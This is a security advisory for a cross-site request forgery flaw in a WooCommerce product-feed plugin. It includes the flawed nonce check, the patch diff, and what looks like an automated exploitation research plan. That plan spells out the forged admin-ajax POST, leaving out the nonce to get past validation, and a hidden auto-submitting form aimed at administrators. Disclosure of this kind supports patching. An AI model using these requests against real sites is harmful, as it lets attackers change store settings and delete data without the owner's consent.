Product Feed PRO for WooCommerce by AdTribes – Product Feeds for WooCommerce 13.4.6 - 13.5.2.1 - Cross-Site Request Forgery to Multiple Administrative Actions
Description
The Product Feed PRO for WooCommerce by AdTribes – Product Feeds for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 13.4.6 through 13.5.2.1. This is due to missing or incorrect nonce validation on the ajax_migrate_to_custom_post_type, ajax_adt_clear_custom_attributes_product_meta_keys, ajax_update_file_url_to_lower_case, ajax_use_legacy_filters_and_rules, and ajax_fix_duplicate_feed functions. This makes it possible for unauthenticated attackers to trigger feed migration, clear custom-attribute transient caches, rewrite feed file URLs to lowercase, toggle legacy filter and rule settings, and delete duplicated feed posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:HTechnical Details
>=13.4.6 <=13.5.2.1What Changed in the Fix
Changes introduced in v13.5.2.2
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-3499 ## 1. Vulnerability Summary The **Product Feed PRO for WooCommerce** plugin (versions 13.4.6 - 13.5.2.1) is vulnerable to **Cross-Site Request Forgery (CSRF)**. Multiple administrative AJAX handlers fail to implement or correctly validate nonces. This al…
Show full research plan
Exploitation Research Plan - CVE-2026-3499
1. Vulnerability Summary
The Product Feed PRO for WooCommerce plugin (versions 13.4.6 - 13.5.2.1) is vulnerable to Cross-Site Request Forgery (CSRF). Multiple administrative AJAX handlers fail to implement or correctly validate nonces. This allows an attacker to trick a logged-in administrator into triggering sensitive actions, such as database migrations, clearing caches, altering feed settings, and deleting feed data.
2. Attack Vector Analysis
- Endpoints:
/wp-admin/admin-ajax.php - Actions:
woosea_migrate_to_custom_post_typeadt_clear_custom_attributes_product_meta_keyswoosea_update_file_url_to_lower_casewoosea_use_legacy_filters_and_ruleswoosea_fix_duplicate_feed
- Method: POST
- Authentication Required: Administrator (via CSRF)
- Preconditions: A site administrator must be logged in and tricked into visiting a malicious page that submits a request to the target site.
3. Code Flow
- Entry Point: The plugin registers AJAX actions in
includes/Classes/Product_Feed_Admin.php(inferred from.potfile references) or a similar admin handler class usingadd_action( 'wp_ajax_woosea_...', ... ). - JS Trigger: In
includes/Classes/WP_Admin.php, the plugin enqueueswoosea_manage.js. This script handles UI buttons on the "Manage Feeds" page. - Vulnerable Sink: The registered callback functions (e.g.,
ajax_use_legacy_filters_and_rules) execute administrative logic. In the affected versions, these functions lack a call tocheck_ajax_referer()orwp_verify_nonce(), or they use a static/predictable token that is not properly validated. - Execution: The function performs the action (e.g.,
update_option('adt_use_legacy_filters_and_rules', 'yes')) without verifying the intent of the user.
4. Nonce Acquisition Strategy
According to the vulnerability description, nonce validation is missing or incorrect.
- Primary Strategy: Attempt the exploit without a nonce. The
woosea_manage_paramslocalization inincludes/Classes/WP_Admin.phpnotably lacks a nonce key, suggesting the developers simply didn't include one in the AJAX request data for these specific actions. - Secondary Strategy (If a nonce is checked but incorrectly): If the handler expects a parameter like
security, check if it accepts the generic WordPress REST nonce or a nonce intended for a different action. - Variable Identification: Check the global
adtObjorwoosea_manage_paramsin the browser console.- Path:
window.woosea_manage_params
- Path:
5. Exploitation Strategy
We will target the woosea_use_legacy_filters_and_rules action as it provides a clear, verifiable change in the database.
Step-by-Step Exploit (using http_request):
- Identify the Target Action:
woosea_use_legacy_filters_and_rules. - Prepare Payload: Craft a POST request that toggles the legacy filters setting.
- Execute Request:
- URL:
https://[TARGET]/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=woosea_use_legacy_filters_and_rules
- URL:
- Expected Response: A successful trigger usually returns
1,true, or a JSON success message like{"success":true}.
6. Test Data Setup
- Install Plugin: Install Product Feed PRO for WooCommerce version 13.5.2.1.
- Activate Plugin: Ensure the plugin is active.
- Verify Initial State:
- Run:
wp option get adt_use_legacy_filters_and_rules - Note if it is 'no' or if the option doesn't exist.
- Run:
7. Expected Results
- The AJAX request to
admin-ajax.phpshould return a200 OKstatus. - The response body should indicate success (e.g.,
1). - The internal state of the WordPress site (specifically the targeted option) will be modified.
8. Verification Steps
After sending the HTTP request, use WP-CLI to confirm the administrative action was performed:
# Verify the legacy filters toggle
wp option get adt_use_legacy_filters_and_rules
# If targeting fix_duplicate_feed, verify total feed counts (requires setup of duplicates)
wp post list --post_type=adt_product_feed --format=count
9. Alternative Approaches
If woosea_use_legacy_filters_and_rules is patched or behaves differently, target the Duplicate Feed Fixer:
- Action:
woosea_fix_duplicate_feed - Purpose: Deletes duplicate feed posts.
- Verification: Create two feeds with identical names and check if one is deleted after the AJAX call.
If the AJAX handlers require a generic "security" token, attempt to extract it from the "About" page where other AdTribes nonces are often localized:
wp post create --post_type=page --post_content='[woosea_manage_feeds]'(if shortcode exists)browser_navigateto the created page.browser_eval("window.woosea_manage_params")to find any potential tokens.
Summary
Product Feed PRO for WooCommerce (versions 13.4.6 - 13.5.2.1) contains multiple Cross-Site Request Forgery (CSRF) vulnerabilities in its AJAX handlers. The plugin's security checks were optional, only validating the 'security' nonce if it was explicitly provided in the request, allowing unauthenticated attackers to bypass validation and trigger administrative actions like toggling settings, clearing caches, or deleting feed data.
Vulnerable Code
// includes/Classes/Usage.php // Line 759 - Vulnerable pattern where nonce check only triggers if 'security' is present if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) { wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) ); } --- // Line 789 - Similar vulnerable pattern in another handler if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'adt_pfp_allow_tracking_nonce' ) ) { wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) ); }
Security Fix
@@ -756,7 +756,7 @@ wp_send_json_error( array( 'message' => __( 'You do not have permission to perform this action.', 'woo-product-feed-pro' ) ) ); } - if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) { + if ( ! isset( $_REQUEST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) { wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) ); } @@ -786,7 +786,7 @@ wp_send_json_error( array( 'message' => __( 'You do not have permission to perform this action.', 'woo-product-feed-pro' ) ) ); } - if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'adt_pfp_allow_tracking_nonce' ) ) { + if ( ! isset( $_REQUEST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'adt_pfp_allow_tracking_nonce' ) ) { wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) ); }
Exploit Outline
The exploit targets administrative AJAX handlers via the WordPress admin-ajax.php endpoint. 1. **Identify Target Action**: Select one of the vulnerable AJAX actions, such as `woosea_use_legacy_filters_and_rules` or `woosea_fix_duplicate_feed`. 2. **Craft Forged Request**: Build a POST request to `/wp-admin/admin-ajax.php` with the body `action=woosea_use_legacy_filters_and_rules`. 3. **Omit Nonce**: Crucially, do not include the `security` parameter. Because the vulnerable versions of the plugin only validate the nonce if the `security` parameter exists, omitting it bypasses the validation logic entirely. 4. **Admin Interaction**: Trick a logged-in site administrator into clicking a link or visiting a page that executes the POST request (e.g., via a hidden auto-submitting HTML form). 5. **Result**: The plugin executes the administrative logic, such as toggling the `adt_use_legacy_filters_and_rules` option, without the admin's conscious intent.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.